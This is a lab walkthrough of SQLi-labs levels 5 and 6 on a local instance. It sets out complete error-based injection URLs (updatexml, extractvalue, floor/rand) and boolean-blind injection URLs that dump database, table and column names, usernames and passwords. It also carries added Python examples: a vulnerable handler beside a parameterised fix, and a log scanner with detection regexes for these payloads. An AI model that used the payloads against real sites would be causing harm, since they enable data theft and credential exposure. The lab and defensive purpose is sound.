Less 5
Start by constructing the closing quote as usual; nothing seems wrong:
http://127.0.0.1/sqlilabs/Less-5/?id=1'
After submitting it, the page shows "You are in......". Following the approach from the earlier levels:
http://127.0.0.1/sqlilabs/Less-5/?id=1' order by 3--+ (the column count is 3)
Look for the echo position and the current database name:
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,3--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' union select 1,2,database()--+
Whatever we try, the page only ever shows "You are in......". The usual approach does not work here, so we suspect some other kind of injection.
Try error-based injection. It comes in the following types.
The concept of error-based injection:
(1) floor-based error: and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a), where payload is the SQL statement you want to insert. Note that this form limits the output to 64 characters.
(2) updatexml-based error: and updatexml(1,payload,1)
This form also limits the output length, to at most 32 characters.
It also constrains the return type of payload: it only takes effect when what payload returns is not in XML format.
(3) extractvalue-based error: and extractvalue(1,payload). The output length is limited to at most 32 characters.
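Both properties that every technique in this writeup relies on are visible in one place: the id parameter is spliced into the SQL text, and the DBMS error text is echoed to the client. The following is an added example, not the lab's own PHP: a handler with those two defects next to a hardened one that binds the parameter and returns a generic message. It uses SQLite with a constructed users table (assumed names and rows) rather than the lab's MySQL, so updatexml/extractvalue/floor themselves are not reproduced; what it shows is that the same input which bends the vulnerable query is treated as plain data by the parameterised one.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's users table (sample rows, not the lab's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return conn

def lookup_vulnerable(conn, user_id):
    """Mirrors the Less 5 pattern: string splicing plus an echoed DBMS error."""
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as e:
        # Leaking the error text is exactly what error-based injection reads from.
        return f"Error: {e}"
    # Like the lab, the row's contents are never shown; only a fixed banner.
    return "You are in..." if row else ""

def lookup_hardened(conn, user_id):
    """Parameterised query: the input is bound as data and can never be parsed as SQL."""
    try:
        row = conn.execute("SELECT username FROM users WHERE id=? LIMIT 1",
                           (user_id,)).fetchone()
    except sqlite3.Error:
        # Record the exception server-side (logging omitted here); never echo it.
        return "Request failed"
    return "You are in..." if row else ""

if __name__ == "__main__":
    conn = make_db()
    # Constructed probes in the style of the writeup: a bare quote, then a boolean test.
    for probe in ("1", "1'", "1' and length('abc')=3 -- ", "1' and length('abc')=4 -- "):
        print(repr(probe), "|", lookup_vulnerable(conn, probe), "|", lookup_hardened(conn, probe))
```

With the vulnerable handler the bare quote produces a database error in the response, and the two boolean probes flip the banner on and off, which is the signal the blind technique at the end of this level reads. The hardened handler answers the same probes with an empty result, because no row has a primary key equal to that literal string.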
0x00 updatexml-based error injection
Usage of updatexml: and updatexml(1,payload,1)
Get the database name
http://127.0.0.1/sqlilabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
The separator ~ is written in hexadecimal as 0x7e
View the table names
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+
Dump the usernames
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username) from users limit 0,1),0x7e),1)--+
Dump the passwords
http://127.0.0.1/sqlilabs/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select group_concat(password) from users limit 0,1),0x7e),1)--+
0x01 extractvalue-based error injection
Usage: and extractvalue(1,payload)
Dump the database name
The hexadecimal 0x23 represents #
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select database()),0x23))--+
Dump the table names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x23))--+
Dump the column names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+
Get the data
View the username
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select username from users order by id limit 1,1),0x23))--+
View the password
http://127.0.0.1/sqlilabs/Less-5/?id=1' and extractvalue(1,concat(0x23,(select password from users order by id limit 1,1),0x23))--+
0x02 floor-based error injection
count(*): returns the number of rows in the given selection
concat(): concatenates strings, e.g. concat('a','b') gives ab
floor(): rounds down
rand(): random number function
rand(0): pseudo-random with a fixed seed, so the generated sequence is predictable
floor(rand(0)*2): the generated sequence follows the fixed pattern 0110110011101...
Usage of floor: and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
The condition for floor error injection is that the table being queried holds at least 3 rows.
Dump the database name
limit 0,1: the database name is information_schema
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
limit 1,1: the database name is challenges
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
And so on.
But there is a shortcut that does it in one step:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
Dump the table names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat(((select concat(table_name) from information_schema.tables where table_schema='security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
Dump the column names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
Get the information
Username
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
Password
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 2,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+
0x03 Boolean-based blind injection
Determine the length of the current database name
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<10-- - //displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<7-- - //displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())<9-- - //displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=7-- - //displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8-- - //displays normally
This shows that the current database name has length 8.
Determine the current database name
Take the first character as an example:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>110-- - //displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>120-- - //displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>115-- - //displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>113-- - //displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))>114-- - //displays normally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=114-- - //displays abnormally
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr(database(),1,1))=115-- - //displays normally
Checking the ASCII table, the first letter is "s"; the remaining characters follow in the same way...
Determine the number of table names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4-- -
Table names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100-- -
The method is similar, so not every case is listed here.
But the more convenient approach is still to write your own script, or to use tools such as sqlmap and Burp Suite (bp).
Less 6
Same as Less 5, except the closing ' is replaced with a closing ".
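Seen from the server side, the three error-based forms and the boolean-blind probing above leave distinctive traces in the web access log. The following is an added example, not part of the writeup: a small scanner that URL-decodes each request target, matches it against signatures for updatexml, extractvalue, the count(*)/floor(rand(0)*2)/group by trick, and the length()/ascii(substr()) comparisons, then raises a per-client alert. The log lines are constructed for this example (assumed IPs and timestamps) and reproduce the shapes of the requests shown above, percent-encoded as a browser would send them. A single comparison in a query string is not suspicious on its own, so the boolean-blind category alerts only once the same client has sent a run of them.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic): one normal request, the three
# error-based probes from the writeup, then a run of boolean-blind comparisons.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqlilabs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)%20--+ HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20extractvalue(1,concat(0x23,(select%20database()),0x23))--+ HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20(select%201%20from%20(select%20count(*),concat((database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20--+ HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20length(database())%3C10--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%3E110--%20- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))%3E120--%20- HTTP/1.1" 200 512
"""

# Common/combined log format: client IP and the request target are all we need.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures for the techniques in the writeup, applied to the URL-decoded request target.
SIGNATURES = {
    "error-based/updatexml":    re.compile(r"updatexml\s*\(", re.I),
    "error-based/extractvalue": re.compile(r"extractvalue\s*\(", re.I),
    # count(*) ... floor(rand(0)*2) ... group by: the duplicate-key trick
    "error-based/floor-rand":   re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\).*\bgroup\s+by\b", re.I | re.S),
    # length()/ascii(substr()) comparisons are the building blocks of boolean-blind probing
    "boolean-blind/length":     re.compile(r"\blength\s*\(.*?\)\s*[<>=]", re.I),
    "boolean-blind/substr":     re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(", re.I),
}

def decode_target(line):
    """Return (ip, decoded request target) for one log line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # unquote_plus also turns the '+' of the '--+' comment terminator into a space.
    return m.group("ip"), unquote_plus(m.group("target"))

def classify(decoded_target):
    """Names of every signature matching the decoded target (empty list if clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_target)]

def scan_log(text):
    """Per-line findings: (ip, decoded target, [signature names]) for each line that matched."""
    findings = []
    for line in text.splitlines():
        parsed = decode_target(line)
        if parsed is None:
            continue
        ip, target = parsed
        hits = classify(target)
        if hits:
            findings.append((ip, target, hits))
    return findings

def alerts(findings, blind_threshold=2):
    """Collapse findings per client: error-based signatures alert on a single hit,
    boolean-blind ones only after blind_threshold comparison probes from the same client."""
    per_ip = defaultdict(lambda: {"error-based": 0, "boolean-blind": 0})
    for ip, _target, hits in findings:
        for name in hits:
            per_ip[ip][name.split("/")[0]] += 1
    out = {}
    for ip, counts in per_ip.items():
        kinds = []
        if counts["error-based"]:
            kinds.append("error-based")
        if counts["boolean-blind"] >= blind_threshold:
            kinds.append("boolean-blind")
        if kinds:
            out[ip] = kinds
    return out

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, target, hits in found:
        print(ip, hits, target)
    print(alerts(found))
```

Decoding before matching matters: the writeup's `--+` arrives as a literal `+`, the quote as `%27` and the comparison operators as `%3C`/`%3E`, so signatures applied to the raw line would miss most of these requests. The same signatures can be fed into whatever log pipeline is in use; the regexes are the portable part.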